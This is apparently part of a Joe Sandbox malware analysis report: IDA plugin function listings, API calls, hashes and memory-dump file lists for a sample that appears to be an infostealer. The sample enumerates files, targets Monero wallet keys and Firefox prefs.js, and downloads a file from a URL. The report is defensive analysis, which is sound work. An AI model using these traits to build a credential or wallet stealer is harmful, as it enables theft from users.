Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 95382fb8b712902f8637a6a0f82e69c788269502cda3e205499b9ac8f8a3a7a6
Instruction ID: 91809a720868aec32bbfa36ea9bdeaa8f86de18354a2ff180f2f3dfa42a928b2
Opcode Fuzzy Hash: 95382fb8b712902f8637a6a0f82e69c788269502cda3e205499b9ac8f8a3a7a6
Instruction Fuzzy Hash: 6CB1B3B1B083509FDB08DF2AC45661ABBF5FB8A704F05893EE899D3B50D774D9018B92

Function 00774910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0077492C
FindFirstFileA.KERNEL32(?,?), ref: 00774943
StrCmpCA.SHLWAPI(?,00780FDC), ref: 00774971
StrCmpCA.SHLWAPI(?,00780FE0), ref: 00774987
FindNextFileA.KERNEL32(000000FF,?), ref: 00774B7D
FindClose.KERNEL32(000000FF), ref: 00774B92

Strings

%s\%s, xrefs: 007749A4
%s\%s, xrefs: 007749FB
%s\*, xrefs: 00774920

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 91402a2f6850b2570f972185f462ea232bd2a560acd8eea84c4c7ad6ba484e5f
Instruction ID: 5bdebffb592a3d3158e2dccc7a5ff9dd4d7e2b404f6c0f1a74e230b622ba93e5
Opcode Fuzzy Hash: 91402a2f6850b2570f972185f462ea232bd2a560acd8eea84c4c7ad6ba484e5f
Instruction Fuzzy Hash: EF6159B1910218ABCF64EBA4DC49EEA737CBF49701F048588B60D96141EB79EB45CFD1

Function 00773EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00773EC3
FindFirstFileA.KERNEL32(?,?), ref: 00773EDA
StrCmpCA.SHLWAPI(?,00780FAC), ref: 00773F08
StrCmpCA.SHLWAPI(?,00780FB0), ref: 00773F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0077406C
FindClose.KERNEL32(000000FF), ref: 00774081

Strings

%s\%s, xrefs: 00773EB7

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 63e8dccc1f5cccf3c2dcb76c69bab4353f9e3788efa21e8d6747541c9a2c4baf
Instruction ID: 121b4965475ca76640b11dbb362d2b09185710e469f6e573410b42adc199ca10
Opcode Fuzzy Hash: 63e8dccc1f5cccf3c2dcb76c69bab4353f9e3788efa21e8d6747541c9a2c4baf
Instruction Fuzzy Hash: 085135B2914218EBCB64EBB4DC49EEA737CBF44340F408588B75D96040DB79AB89DF91

Function 0076F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007815B8,00780D96), ref: 0076F71E
StrCmpCA.SHLWAPI(?,007815BC), ref: 0076F76F
StrCmpCA.SHLWAPI(?,007815C0), ref: 0076F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0076FAB1
FindClose.KERNEL32(000000FF), ref: 0076FAC3

Strings

prefs.js, xrefs: 0076F812

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 370ef150b05c7d876b3600ad6588740f73f5a613f9cada6e511947e9369e58b3
Instruction ID: 20667fc3e1aa8fd33340072e04a559d1479e7145559bbc176356bf5811cdb30d
Opcode Fuzzy Hash: 370ef150b05c7d876b3600ad6588740f73f5a613f9cada6e511947e9369e58b3
Instruction Fuzzy Hash: 05B12171910104EBDF24FB64DC9AAEE7379AF94340F40C5A8E90E96151EF386B49CF92

Function 007616D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0078510C,?,?,?,007851B4,?,?,00000000,?,00000000), ref: 00761923
StrCmpCA.SHLWAPI(?,0078525C), ref: 00761973
StrCmpCA.SHLWAPI(?,00785304), ref: 00761989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00761D40
DeleteFileA.KERNEL32(00000000), ref: 00761DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00761E20
FindClose.KERNEL32(000000FF), ref: 00761E32

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Strings

\*.*, xrefs: 007617F1

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 8080d32483ca0b6155b4d04715b7cc0c1718f8ac24807340f87edaacb25d4882
Instruction ID: c9f4fe69b5351ab0565702b325ca6b0fd49fc5871c50719c724950e8f983ef58
Opcode Fuzzy Hash: 8080d32483ca0b6155b4d04715b7cc0c1718f8ac24807340f87edaacb25d4882
Instruction Fuzzy Hash: 9212C271910118EBEF55FB60CC5AEEE7378AF94340F4081A9A51E62091EF386F49CF92

Function 0076DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007814B0,00780C2A), ref: 0076DAEB
StrCmpCA.SHLWAPI(?,007814B4), ref: 0076DB33
StrCmpCA.SHLWAPI(?,007814B8), ref: 0076DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0076DDCC
FindClose.KERNEL32(000000FF), ref: 0076DDDE

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: fea645061a4ee41fdbc3a9b8af284c0b9dc0c29bfdffc94c99348941902605f1
Instruction ID: e9516e7c65e75b770341644d17cb5dfa0e468c7ca181d14953e85c7b949a9ff9
Opcode Fuzzy Hash: fea645061a4ee41fdbc3a9b8af284c0b9dc0c29bfdffc94c99348941902605f1
Instruction Fuzzy Hash: DE912F72A10104EBDF15FBB4DC5A9EE737CAFC4340F408568B91A96181EE389B19CBD2

Function 007660A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 007647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00764839
Part of subcall function 007647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00764849

InternetOpenA.WININET(00780DF7,00000001,00000000,00000000,00000000), ref: 0076610F
StrCmpCA.SHLWAPI(?,0125E978), ref: 00766147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0076618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007661B3
InternetReadFile.WININET(?,?,00000400,?), ref: 007661DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0076620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00766249
InternetCloseHandle.WININET(?), ref: 00766253
InternetCloseHandle.WININET(00000000), ref: 00766260

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 0e61c0b328ed3b33de19bc3e45a96061aa28edef24f984c06c047b3cead13dd6
Instruction ID: 4a8210e08271c5fd8b3d7dc4c711c7b0a1bf38041b25175328deb8e6398dcb79
Opcode Fuzzy Hash: 0e61c0b328ed3b33de19bc3e45a96061aa28edef24f984c06c047b3cead13dd6
Instruction Fuzzy Hash: D1516FB1910218AFDF20DF50DC59BEE77B8FF44701F508098B60AA7180DB786A89CF95

Function 00777B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

GetKeyboardLayoutList.USER32(00000000,00000000,007805AF), ref: 00777BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00777BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00777C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00777C62
LocalFree.KERNEL32(00000000), ref: 00777D22

Strings

/ , xrefs: 00777C7F

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
